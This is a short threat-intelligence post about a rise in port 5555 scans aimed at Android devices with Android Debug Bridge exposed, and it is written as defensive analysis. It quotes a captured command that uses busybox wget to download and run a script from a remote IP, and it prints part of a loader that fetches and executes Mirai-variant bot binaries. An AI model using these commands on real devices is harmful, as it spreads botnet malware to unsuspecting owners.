Last Updated: 2018-07-10 14:34:35 UTC
by Johannes Ullrich (Version: 1)
Today, I noticed a marked increase in port 5555 scans.
Our honeypot detected odd traffic on this port:
OPEN]+shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95 .215 .62.169/adbs -O -> adbs; sh adbs; rm adbs
Note that our honeypot has a web server listening on this port, so it is not going to respond to this sequence. As it turns out, this command is directed at the Android Debug Bridge, an optional feature in the Android operating system. Recently, researchers discovered that this feature appears to be enabled on some Android phones . The feature does allow for full shell access to the phone, and the above command may be executed.
The initial script downloaded:
n="arm.bot.le mips.bot.be mipsel.bot.le arm7.bot.le x86_64.bot.le i586.bot.le i686.bot.le"
for a in $n
cp /system/bin/sh $a
busybox wget http://$http_server/adb/$a -O -> $a
chmod 777 $a
for a in $n
Which then downloads the actual "worm" for various platforms and attempts to run them. A quick analysis of the file via virus total suggests that this is a Mirai variant .
The initial download URL appears to be hardcoded into the binary. It does not look like it turns the infected system into a web server to spread the malware. Instead, it just refers to 126.96.36.199, a data center in Spain (the network was notified via email@example.com and firstname.lastname@example.org)
Shortly after I downloaded the first binary, the web server became unresponsive. I am not sure if this is due to high load, or due to the ISP taking down the site. Virustotal has seen related binaries from this host since at least June. Christian Dietrich uploaded a similar binary on June 21st that was received via the more "traditional" telnet attack Mirai uses .